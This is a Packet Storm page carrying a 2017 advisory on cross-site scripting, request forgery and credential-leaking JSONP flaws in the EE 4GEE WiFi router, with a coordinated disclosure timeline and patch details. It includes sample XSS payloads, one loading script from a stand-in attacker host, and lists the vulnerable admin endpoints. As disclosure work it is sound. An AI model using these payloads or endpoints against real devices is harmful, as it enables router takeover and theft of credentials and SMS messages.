exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

EE 4GEE Wireless Router EE60_00_05.00_25 XSS / CSRF / Disclosure

EE 4GEE Wireless Router EE60_00_05.00_25 XSS / CSRF / Disclosure
Posted Sep 8, 2017
Authored by James Hemmings

EE 4GEE wireless router version EE60_00_05.00_25 suffers from cross site request forgery, cross site scripting, and information disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure, csrf
SHA-256 | df351b407db9242190cf3bbea62bf65f1e04f7a9d97b0fbf8792987089fa564e

EE 4GEE Wireless Router EE60_00_05.00_25 XSS / CSRF / Disclosure

Change Mirror Download
EE 4GEE Wireless Router - Multiple Security Vulnerabilities Advisory
-------------------------------------------------
Hardware Version/Model: 4GEE WiFi MBB (EE60VB-2AE8G83).
Vulnerable Software Version: EE60_00_05.00_25.
Patched Software Version: EE60_00_05.00_31.
Product URL:
https://shop.ee.co.uk/dongles/pay-monthly-mobile-broadband/4gee-wifi/details

Proof of Concept Writeup:
https://blog.jameshemmings.co.uk/2017/08/24/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities-writeup/#more-276

Disclosure Timeline:
27th July, 2017 at 21:32 GMT. Email sent with technical vulnerability
information and PoC.
27th July, 2017 at 22:00 GMT. Response from EE devices manager,
confirming receipt of PoC.
31th July, 2017 at 18:47 GMT. Update from vendor, patches being
developed for reported issues.
1st August, 2017 at 10:43 GMT. Reply sent to vendor.
10th August, 2017 at 10:32 GMT. Update from vendor, patches still being
developed.
18th August, 2017 at 12:11 GMT. Email sent to vendor asking for update/ETA.
18th August, 2017 at 12:15 GMT. Response from vendor, updates to be
released on Monday.
18th August, 2017 at 12:30 GMT. Reply sent to vendor with device IMEI
for online update process.
22nd August, 2017 at 15:54 GMT. Response from vendor, beta firmware
released to verify changes.
23rd August, 2017 at 21:29 GMT. Reply sent to vendor, vulnerabilities
successfully patched.
24th August, 2017 at 09:32 GMT. Response from vendor, patch publicly
released to customers.
24th August, 2017 at 12:00 GMT. Full disclosure via Blog.

-------------------------------------------------
Stored Cross Site Scripting (XSS) - SMS Messages:
-------------------------------------------------
Attack Type: Remote
Impact: Code Execution
Affected Components:
http://ee.mobilebroadband/default.html#sms/smsList.html?list=inbox
http://ee.mobilebroadband/getSMSlist?rand=0.19598614685224347

Attack Vectors: An attacker can exploit the vulnerability by sending a
remote SMS message to the device with an XSS payload such as "<script
src=http://payload.js</script>" which is executed upon the user viewing
the SMS message within the admin panel "SMS Inbox" functionality.
Additionally, self-XSS can be achieved by creating an XSS payload from
the device its self within a text message, which could be chained with
other vulnerabilities such as CSRF.

Vulnerability Description:The 4GEE Mobile WiFi Router is vulnerable to
Stored Cross Site Scripting (XSS) within the "sms_content" parameter
returned to the application's SMS Inbox webpage by the "getSMSlist" POST
request, due to a lack of input validation and/or encoding. This exploit
can be triggered by remotely sending an SMS message containing any XSS
payload such as '"><script src=http://attacker.tld/r.js></script>' which
upon clicking on the text message within the web application is
successfully executed.

Additionally, due to the other vulnerabilities identified within this
device, such vulnerability can be chained with Cross Site Request
Forgery (CSRF) using the Stored XSS payload to send an JavaScript XHR
POST request to the "uploadSettings" web-page containing binary
configuration data, allowing for total modification of device settings
by an attacker.

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 7.1
- High).

Author: James Hemmings - security@jameshemmings.co.uk
Reference(s):
[1]
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities

-------------------------------------------------
Cross Site Request Forgery (CSRF) - Multiple:
-------------------------------------------------
Attack Type: Remote
Impact: Code Execution
Affected Components:
http://192.168.1.1/goform/AddNewProfile?rand=0.376065695742409
http://192.168.1.1/goform/setWanDisconnect?rand=0.6988130822240772
http://192.168.1.1/goform/setSMSAutoRedirectSetting?rand=0.9003361879232169
http://192.168.1.1/goform/setReset?rand=0.021764703082234105
http://192.168.1.1/goform/uploadBackupSettings

Attack Vectors: An attacker could attempt to trick users into accessing
malicious CSRF payload URLs, which would allow an attacker to execute
privileged functions such as device reset, device reboot, internet
connection and disconnection, SMS message redirection and binary
configuration file upload, which would allow modification of all device
settings. Addtionally, this exploit can be chained together using other
vulnerabilities discovered to be remotely exploitable over SMS, using
Stored Cross Site Scripting (XSS).

Vulnerability Description: The 4GEE Mobile WiFi Router is vulnerable to
multiple Cross Site Request Forgery (CSRF) vulnerabilities within
various router administration web-pages, due to the lack of robust
request verification tokens within requests. An attacker could persuade
an authenticated user to visit a malicious website using phishing and/or
social engineering techniques to send an CSRF request to the web
application, thus executing the privileged function as the authenticated
user. In this case, due to the lack of authentication on certain
privileged functions, authentication may not be necessary.

The following web-pages were identified to be vulnerable to Cross Site
Request Forgery (CSRF) attacks:

AddNewProfile [2].
setWanDisconnect [3].
setSMSAutoRedirectSetting [4].
setReset [5].
uploadBackupSettings [6].

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 6.8
- Medium).

Author: James Hemmings - security@jameshemmings.co.uk
Reference(s):
[1]
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities

[2]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/AddProfileCSRFXSSPoc.html

[3]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFInternetDCPoC.html

[4]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFPocRedirectSMS.html

[5]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFPocResetDefaults.html

[6]
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/uploadBinarySettingsCSRFPoC.html


-------------------------------------------------
JSONP Sensitive Information Disclosure - Multiple
-------------------------------------------------
Attack Type: Remote
Impact: Information Disclosure
Affected Components:
http://192.168.1.1/goform/getPasswordSaveInfo
http://192.168.1.1/goform/getSingleSMSReport?rand=0.133713371337
http://192.168.1.1/goform/getSingleSMS?sms_id=1&rand=0.133713371337
http://192.168.1.1/goform/getSMSStoreState
http://192.168.1.1/goform/getSMSAutoRedirectSetting
http://192.168.1.1/goform/getSysteminfo
http://192.168.1.1/goform/getUsbIP?rand=0.13371337

Attack Vectors: An attacker on the local network could escalate
privileges from unauthenticated user, to authenticated administrative
user by accessing the saved admin credentials within the JSONP endpoint.
Additionally, an attacker could access network configuration data and
SMS messages without authentication.

Vulnerability Description: The 4GEE Mobile WiFi Router is vulnerable to
multiple JSONP information disclosure vulnerabilities within various
endpoints which retrieve and/or set data. The JSONP endpoints allow for
unauthenticated information disclosure of sensitive configuration data,
settings, administration passwords and SMS messages, due to the lack of
robust and effective access control. An attacker could view such
unauthenticated endpoints via the local WiFi network to gain access to
the administration credentials, router configuration and/or SMS messages.

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 8.1
- High).

Author: James Hemmings - security@jameshemmings.co.uk
Reference(s):
[1]
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities


-------------------------------------------------
Disclaimer
-------------------------------------------------
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author
nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close